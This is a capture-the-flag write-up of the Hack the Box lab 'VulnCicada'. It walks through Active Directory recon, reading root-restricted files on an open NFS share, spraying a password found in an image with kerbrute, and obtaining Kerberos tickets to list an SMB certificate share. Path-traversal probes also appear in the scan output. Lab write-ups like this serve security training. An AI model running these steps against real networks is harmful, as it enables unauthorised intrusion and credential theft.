Box Info
Box Name: VulnCicada
Listed Difficulty Rating: Medium
chasepd’s Difficulty Rating: Medium-Hard (mostly due to flaky and complicated exploit)
Release Date: 2025 (Formerly from Vulnlab, acquired by Hack the Box)
Tech Stack: Kerberos, NFS, Active Directory, Active Directory Certificate Services
Skills Learned: NFS enumeration, Active Directory enumeration, ADCS exploits
Recon
To start, add some hostnames to /etc/hosts to make referencing the box easier. I always add boxname as well as boxname.htb to start with. For former Vulnlab machines like this one, I also add boxname.vl, as these boxes sometimes use that naming.
As always, we run an nmap scan to get some basic intel on the machine. Since it’s a Windows machine, we should also run enum4linux.
└──╼ $nmap -oN nmapscan -A vulncicada
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-03 10:29 MDT
Stats: 0:01:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.77% done; ETC: 10:31 (0:00:00 remaining)
Nmap scan report for vulncicada (10.129.29.26)
Host is up (0.067s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-03 16:29:36Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-07-03T16:31:03+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Not valid before: 2025-04-09T08:36:14
|_Not valid after: 2025-10-09T08:36:14
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-03T16:30:27
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.45 seconds
From the nmap scan we now know that the box is DC-JPQ225.cicada.vl. We should add this to our hosts file, since it’s likely we’ll need to use the correct hostname to interact with Kerberos, which is also running here. There’s also a website, so we’ll need to check that out. Interestingly, the port for RDP is open, so we may be able to RDP in if we can get credentials.
enum4linux doesn’t give us anything helpful. smbclient -L \\\\cicada.vl tells us SMB shares aren’t enabled. Time to check out the website and see what info that might give us.
The website is just the default IIS page:

When doing web enumeration I run three commands simultaneously:
gobuster dir -u http://cicada.vl -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
This does a broad spread of web enumeration looking for default directories and endpoints.
dirsearch -u http://cicada.vl
dirsearch is more or less the same as gobuster, but I like to run it in tandem with its default wordlist because occasionally it will find things that my default gobuster enum misses.
gobuster vhost --append-domain -u http://cicada.vl -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
This looks for subdomains that might exist on the host, which might surface alternate web apps we can enumerate and exploit. The --append-domain flag tells gobuster that we’re looking for subdomains of the original domain we provided.
Neither of our gobuster searches turn up anything, but dirsearch comes back with:
└──╼ $dirsearch -u http://cicada.vl
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/chasepd/htb/vulncicada/reports/http_cicada.vl/_25-07-03_10-44-38.txt
Target: http://cicada.vl/
[10:44:38] Starting:
[10:44:39] 403 - 312B - /%2e%2e//google.com
[10:44:39] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:44:44] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:44:52] 403 - 1KB - /certenroll/
[10:44:52] 401 - 1KB - /certsrv/
[10:44:52] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Foothold
Most of these results are likely garbage, but /certenroll/ and /certsrv/ both stick out as interesting and unusual. A quick search shows that these endpoints are related to Active Directory Certificate Services, specifically Certification Authority Web Enrollment. A Certificate Authority issues certificates for various services: for example, public CAs are mutually trusted third parties that sign SSL/TLS certificates, and browsers ship with trust for those CAs and use their public keys to verify certificates that claim to have been issued by them. Unfortunately for us right now, /certenroll/ gives a 403 response and /certsrv/ asks for a username and password when we navigate to it in a browser, so we can’t do anything with this yet.
Looking back at the nmap results, we see that there’s an NFS (Network File System) server running on port 2049. Let’s check out what might be available there.
There’s a publicly available folder on it:
└──╼ $showmount -e cicada.vl
Export list for cicada.vl:
/profiles (everyone)
Let’s mount this and see what is there:
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $sudo mkdir /mnt/cicada_nfs
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $sudo mount -t nfs cicada.vl:/profiles /mnt/cicada_nfs/
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $ls -la /mnt/cicada_nfs/
total 10
drwxrwxrwx 2 nobody nogroup 4096 Jun 3 04:21 .
drwxr-xr-x 1 root root 20 Jul 3 11:09 ..
drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 Administrator
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Daniel.Marshall
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Debra.Wright
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Jane.Carter
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Jordan.Francis
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Joyce.Andrews
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Katie.Ward
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Megan.Simpson
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Richard.Gibbons
drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 Rosie.Powell
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Shirley.West
A bunch of directories named after (presumably) users. This is already very helpful as it gives us some potential usernames to start working with, but let’s dig in and see what else we can find in these directories.
There are only two directories with anything in them, Administrator and Rosie.Powell:
┌─[chasepd@THE-HACKINATOR]─[/mnt/cicada_nfs/Rosie.Powell]
└──╼ $la
total 1.8M
drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 .
drwxrwxrwx 2 nobody nogroup 4.0K Jun 3 04:21 ..
drwx------ 2 nobody nogroup 64 Sep 15 2024 Documents
-rwx------ 1 nobody nogroup 1.8M Sep 13 2024 marketing.png
┌─[chasepd@THE-HACKINATOR]─[/mnt/cicada_nfs/Administrator]
└──╼ $la
total 1.5M
drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 .
drwxrwxrwx 2 nobody nogroup 4.0K Jun 3 04:21 ..
drwx------ 2 nobody nogroup 64 Sep 15 2024 Documents
-rwxrwxrwx 1 nobody nogroup 1.5M Sep 13 2024 vacation.png
The only thing we actually have access to here is vacation.png, which is a lovely picture of the Admin working while traveling. Just what everyone should do for a nice, relaxing vacation.
However, while the mount has presumably preserved the file permissions from the server, the share is now mounted on our machine, and our attacker machine’s root user has access to everything on our attacker machine. What happens if we try to access this share as root?
Sure enough, we can access the restricted files. The Documents folders of both users are boring and just contain desktop.ini files as well as recycled old desktop.ini files, but the restricted marketing.png file is interesting:

Rosie.Powell has provided us with an image of her working, and it tells us two important things. One, that Cicada gives their employees RGB-clad gaming PCs to work on and we should all apply there as soon as possible, and also that Rosie keeps a sticky note on her desk with what looks like a password written on it: Cicada123.
Sadly, Rosie.Powell doesn’t appear to have access to ADCS, but that’s not really that surprising given she’s in marketing. However, she still may have access to enumerate the domain, or connect via RDP.
RDP ends up being a dud, and ldapdomaindump tells us that the credentials Rosie.Powell:Cicada123 are invalid. However, there are a bunch of users we know about, and maybe this is a default password or something. Let’s see if any of the other users we discovered are using that password.
With our basic wordlists built, let’s try some stuff:
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $cat users
Administrator
Daniel.Marshall
Debra.Wright
Jane.Carter
Jordan.Francis
Joyce.Andrews
Katie Ward
Megan.Simpson
Richard.Gibbons
Rosie.Powell
Shirley.West
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $cat passwords
Cicada123
Since Kerberos is running and we know we’re already hitting STATUS_NOT_SUPPORTED (which can mean the auth method we’re using isn’t supported by the server) on SMB, let’s try Kerbrute to bruteforce Kerberos creds.
First we can check that these usernames we have are actually real:
└──╼ $kerbrute userenum --dc DC-JPQ225.cicada.vl -d cicada.vl users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 07/03/25 - Ronnie Flathers @ropnop
2025/07/03 11:47:26 > Using KDC(s):
2025/07/03 11:47:26 > DC-JPQ225.cicada.vl:88
2025/07/03 11:47:26 > [+] VALID USERNAME: Joyce.Andrews@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Daniel.Marshall@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Debra.Wright@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Megan.Simpson@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Administrator@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Jane.Carter@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Richard.Gibbons@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Jordan.Francis@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Rosie.Powell@cicada.vl
2025/07/03 11:47:26 > Done! Tested 11 usernames (9 valid) in 0.131 seconds
Very nice, we have 9 valid users. Let’s see if any of them are using Cicada123 as their password.
└──╼ $kerbrute passwordspray --dc DC-JPQ225.cicada.vl -d cicada.vl users Cicada123
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 07/03/25 - Ronnie Flathers @ropnop
2025/07/03 11:49:05 > Using KDC(s):
2025/07/03 11:49:05 > DC-JPQ225.cicada.vl:88
2025/07/03 11:49:05 > [+] VALID LOGIN: Rosie.Powell@cicada.vl:Cicada123
2025/07/03 11:49:05 > Done! Tested 11 logins (1 successes) in 0.213 seconds
So Rosie IS using Cicada123 as her password; we just need to auth with Kerberos instead. cracks knuckles
Let’s start by setting up /etc/krb5.conf on our attacker machine:
[libdefaults]
default_realm = CICADA.VL
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
forwardable = true
rdns = false
[realms]
CICADA.VL = {
kdc = DC-JPQ225.cicada.vl:88
admin_server = DC-JPQ225.cicada.vl:749
default_domain = cicada.vl
}
[domain_realm]
.cicada.vl = CICADA.VL
cicada.vl = CICADA.VL
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $kinit Rosie.Powell@CICADA.VL
Password for Rosie.Powell@CICADA.VL:
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: Rosie.Powell@CICADA.VL
Valid starting Expires Service principal
07/03/2025 11:53:55 07/03/2025 21:53:55 krbtgt/CICADA.VL@CICADA.VL
renew until 07/04/2025 11:53:52
Sure enough, we have a valid ticket.
Going Deeper
We can export it to tell impacket and other tools where to get at it:
export KRB5CCNAME=/tmp/krb5cc_1000
Let’s request service tickets for several services and see what we can do:
└──╼ $kvno HOST/DC-JPQ225.cicada.vl@CICADA.VL
HOST/DC-JPQ225.cicada.vl@CICADA.VL: kvno = 5
└──╼ $kvno HTTP/DC-JPQ225.cicada.vl@CICADA.VL
HTTP/DC-JPQ225.cicada.vl@CICADA.VL: kvno = 5
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: Rosie.Powell@CICADA.VL
Valid starting Expires Service principal
07/03/2025 11:53:55 07/03/2025 21:53:55 krbtgt/CICADA.VL@CICADA.VL
renew until 07/04/2025 11:53:52
07/03/2025 12:01:09 07/03/2025 21:53:55 HTTP/DC-JPQ225.cicada.vl@CICADA.VL
renew until 07/04/2025 11:53:52
07/03/2025 12:02:37 07/03/2025 21:53:55 HOST/DC-JPQ225.cicada.vl@CICADA.VL
renew until 07/04/2025 11:53:52
We’re able to get in via SMB:
└──╼ $impacket-smbclient -k -no-pass cicada.vl/Rosie.Powell@DC-JPQ225.cicada.vl
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# shares
ADMIN$
C$
CertEnroll
IPC$
NETLOGON
profiles$
SYSVOL
Best of all we seem to have access to the CertEnroll share:
# use CertEnroll
# ls
drw-rw-rw- 0 Thu Jul 3 10:29:36 2025 .
drw-rw-rw- 0 Fri Sep 13 09:17:59 2024 ..
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(1)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(1).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(10)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(10).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(11)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(11).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(12)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(12).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(13)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(13).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(14)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(14).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(15)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(15).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(16)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(16).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(17)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(17).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(18)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(18).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(19)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(19).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(2)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(2).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(20)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(20).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(21)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(21).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(22)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(22).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(23)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(23).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(24)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(24).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(25)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(25).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(26)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(26).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(27)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(27).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:27 2025 cicada-DC-JPQ225-CA(28)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:27 2025 cicada-DC-JPQ225-CA(28).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(3)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(3).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(4)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(4).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(5)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(5).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(6)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(6).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(7)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(7).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(8)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(8).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(9)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(9).crl
-rw-rw-rw- 736 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA+.crl
-rw-rw-rw- 933 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA.crl
-rw-rw-rw- 1385 Sun Sep 15 07:18:43 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(0-1).crt
-rw-rw-rw- 924 Sun Sep 15 01:51:18 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(1).crt
-rw-rw-rw- 1390 Sun Sep 15 07:18:43 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(1-0).crt
-rw-rw-rw- 1390 Sun Sep 15 07:18:43 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(1-2).crt
-rw-rw-rw- 924 Thu Apr 10 02:44:43 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(10).crt
-rw-rw-rw- 1391 Thu Apr 10 23:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(10-11).crt
-rw-rw-rw- 1391 Thu Apr 10 02:57:00 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(10-9).crt
-rw-rw-rw- 924 Thu Apr 10 02:58:25 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(11).crt
-rw-rw-rw- 1391 Thu Apr 10 23:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(11-10).crt
-rw-rw-rw- 1391 Thu Apr 10 23:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(11-12).crt
-rw-rw-rw- 924 Thu Apr 10 03:00:22 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(12).crt
-rw-rw-rw- 1391 Thu Apr 10 23:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(12-11).crt
-rw-rw-rw- 1391 Thu Apr 10 23:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(12-13).crt
-rw-rw-rw- 924 Thu Apr 10 03:03:13 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(13).crt
-rw-rw-rw- 1391 Thu Apr 10 23:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(13-12).crt
-rw-rw-rw- 1391 Tue Jun 3 04:21:47 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(13-14).crt
-rw-rw-rw- 924 Thu Apr 10 23:49:41 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(14).crt
-rw-rw-rw- 1391 Tue Jun 3 04:22:11 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(14-13).crt
-rw-rw-rw- 1391 Tue Jun 3 04:22:11 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(14-15).crt
-rw-rw-rw- 924 Thu Apr 10 23:51:40 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(15).crt
-rw-rw-rw- 1391 Tue Jun 3 04:22:11 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(15-14).crt
-rw-rw-rw- 1391 Tue Jun 3 04:22:12 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(15-16).crt
-rw-rw-rw- 924 Thu Apr 10 23:53:40 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(16).crt
-rw-rw-rw- 1391 Tue Jun 3 04:22:12 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(16-15).crt
-rw-rw-rw- 1391 Wed Jun 4 06:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(16-17).crt
-rw-rw-rw- 924 Tue Jun 3 04:23:15 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(17).crt
-rw-rw-rw- 1391 Wed Jun 4 06:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(17-16).crt
-rw-rw-rw- 1391 Wed Jun 4 06:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(17-18).crt
-rw-rw-rw- 924 Tue Jun 3 04:24:51 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(18).crt
-rw-rw-rw- 1391 Wed Jun 4 06:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(18-17).crt
-rw-rw-rw- 1391 Wed Jun 4 06:51:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(18-19).crt
-rw-rw-rw- 924 Tue Jun 3 04:26:51 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(19).crt
-rw-rw-rw- 1391 Wed Jun 4 06:51:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(19-18).crt
-rw-rw-rw- 1391 Wed Jun 4 07:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(19-20).crt
-rw-rw-rw- 924 Sun Sep 15 01:53:03 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(2).crt
-rw-rw-rw- 1390 Sun Sep 15 07:18:44 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(2-1).crt
-rw-rw-rw- 1390 Sun Sep 29 03:41:29 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(2-3).crt
-rw-rw-rw- 924 Wed Jun 4 06:52:43 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(20).crt
-rw-rw-rw- 1391 Wed Jun 4 07:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(20-19).crt
-rw-rw-rw- 1391 Wed Jun 4 07:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(20-21).crt
-rw-rw-rw- 924 Wed Jun 4 06:54:47 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(21).crt
-rw-rw-rw- 1391 Wed Jun 4 07:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(21-20).crt
-rw-rw-rw- 1391 Wed Jun 4 07:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(21-22).crt
-rw-rw-rw- 924 Wed Jun 4 06:56:47 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(22).crt
-rw-rw-rw- 1391 Wed Jun 4 07:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(22-21).crt
-rw-rw-rw- 1391 Wed Jun 4 08:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(22-23).crt
-rw-rw-rw- 924 Wed Jun 4 07:36:17 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(23).crt
-rw-rw-rw- 1391 Wed Jun 4 08:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(23-22).crt
-rw-rw-rw- 1391 Wed Jun 4 08:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(23-24).crt
-rw-rw-rw- 924 Wed Jun 4 07:38:20 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(24).crt
-rw-rw-rw- 1391 Wed Jun 4 08:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(24-23).crt
-rw-rw-rw- 1391 Wed Jun 4 08:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(24-25).crt
-rw-rw-rw- 924 Wed Jun 4 07:40:21 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(25).crt
-rw-rw-rw- 1391 Wed Jun 4 08:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(25-24).crt
-rw-rw-rw- 1391 Thu Jul 3 10:24:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(25-26).crt
